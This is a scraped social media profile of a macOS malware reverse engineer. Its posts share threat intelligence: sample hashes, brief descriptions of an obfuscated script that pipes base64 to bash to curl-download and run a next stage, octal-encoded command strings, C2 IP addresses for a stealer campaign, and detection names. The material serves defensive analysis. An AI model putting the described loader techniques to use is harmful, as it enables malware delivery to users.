reverse engineer | arm64 :) | macOS/iOS | YouTube: youtube.com/@l0psec
Joined October 2017
- Tweets 2,974
- Following 1,820
- Followers 3,642
- Likes 13,097
581 Photos and videos
My new site for learning macOS malware reverse engineering:
l0psec.github.io/Malware_RE_…
I got my start in RE by using @patrickwardle's awesome blog. I would download samples and follow along. So I created this to complement that with dives into specific code from recent samples.
8
91
404
25,082
Quick one. Shared by @malwrhunterteam:
13e931b95b927b94b950cbc4f67ce17c96d350d81c04f07e523af613ada8397e - scpt file. 1 VT detection. Just uses base64 encoded string piped to bash to exec curl to download (from 172.94.9\.250) and exec next stage.
🧵
1
3
9
3,456
Been spending a lot of time with Unified Logs and discovered XProtect Behavioral Bastion events being handled by XProtectBridgeService. These all correspond to syspolicyd policy violations. Captures hash and path, very useful! Brief fun summary, more to come on this :)
🧵
1
7
26
1,409
Some of the behavioral detections observed
(there's more of these):
macOS.DataExfil.Clipboard
macOS.Browser.Generic
macOS.Messages.Generic
macOS.Network.Outgoing
macOS.Execution.TempDir
1
166
.@Volexity has published details from an incident response engagement in September 2025 involving multiple #BRICKSTORM variants deployed by a threat actor that Volexity tracks as VerdantBamboo. This case involved the breach of the victim organization’s MSP and multiple malware implants found on firewalls, cloud storage sync devices & NAS appliances. VerdantBamboo used a #0day privilege escalation exploit in the process and was also observed using administrative access to the victim organization's firewall to enable a custom VPN.
For more details on how the incident unfolded, the malware used by the threat actor, and the end goal of the intrusion, check out the full blog post: volexity.com/blog/2026/06/04…
#dfir
22
49
22,826
L0Psec retweeted
Jun 3
New macOS Backdoor "FlutterShell" 🍎🐛
Discovered & analyzed by @PaloAltoNtwks @Unit42_Intel 🙌🏼
"weaponizes AI summarization features for data exfiltration by routing documents through an attacker-controlled server before processing them " 👀🔥
unit42.paloaltonetworks.com/…
15
49
5,589
Interesting script 8145a7920d69ee42e12533f5ef8d5e1168cd574db3586cb30af82f54c66d2f1d shared by @malwrhunterteam
This uses octal bytes passed to printf for the ASCII characters. for example: \143\165\162\154 = curl, Decoded the URLs in the script.
🧵Quick summary
2
7
27
6,629
L0Psec retweeted
May 27
Fake ChatGPT typosquat pushing Stealers cross-platform 👀
🍎 macOS → #Odyssey Stealer
🪟 Windows → #NOVABLIGHT / Sordeal MaaS
📱 mobile QRs are the only legit links 🤷♂️
🧬 same Odyssey C int.
🔐 HH:MM seed in __cstring
🏗️ codesign tag ChatGpt-
👤 affiliate: "d***"
📡 C2 → 172[.]94.9.250
📡 bot handler → 192[.]253.248.181
💰 ReplaceApp → Ledger/Trezor apps
ALT Active ChatGPT/OpenAI typosquat serving stealers cross-platform macOS = Odyssey Stealer 🪟 Windows = NOVABLIGHT / Sordeal MaaS
![🧬 Odyssey internals unchanged: C MLCG framework HH:MM:SS seed in __cstring
🏗️ ad-hoc codesign tag: ChatGpt-<sha1> → builder/campaign fingerprint
📡 C2: 172[.]94.9.250
📡 bot handler: 192[.]253.248.181
💰 ReplaceApp targets: Ledger Live / Ledger Wallet / Trezor Suite](https://venexa.site/media/HJWpuWLXgAwliIg.jpg)
ALT 🧬 Odyssey internals unchanged: C MLCG framework HH:MM:SS seed in __cstring 🏗️ ad-hoc codesign tag: ChatGpt-<sha1> → builder/campaign fingerprint 📡 C2: 172[.]94.9.250 📡 bot handler: 192[.]253.248.181 💰 ReplaceApp targets: Ledger Live / Ledger Wallet / Trezor Suite
1
15
60
4,405
More DPRK (mach-O man) Alex Lopez signed samples shared by @malwrhunterteam: 0517ca4649e33faefa3a6bfcd2707a8376a981be4b42b9d19146ebb93e7f8a35 - winapp. 6 VT hits, very similar to last one covered but there's a couple updates I'll add here.
🧵
1
7
32
5,153
L0Psec retweeted
⏳Only one month left to apply for "Objective for the We" (#OFTW) v4.0
#OFTW is a free 🍏-security event empowering the next generation:
📍 Berlin
🗓️ July 30–31, 2026
More info/to apply: objective-see.org/oftw/v4.ht…
1
10
16
2,183
L0Psec retweeted
May 25
ClickFix has quickly become one of the biggest social engineering threats facing Mac users.
In the latest Security Bite Podcast by @9to5mac, @arinwaichulis sits down with @osint_barbie from Moonlock Lab and @L0Psec to unpack why ClickFix works so well, who it targets, and how Mac malware is evolving in 2026.
Listen here: 9to5mac.com/2026/05/11/secur…
8
18
4,016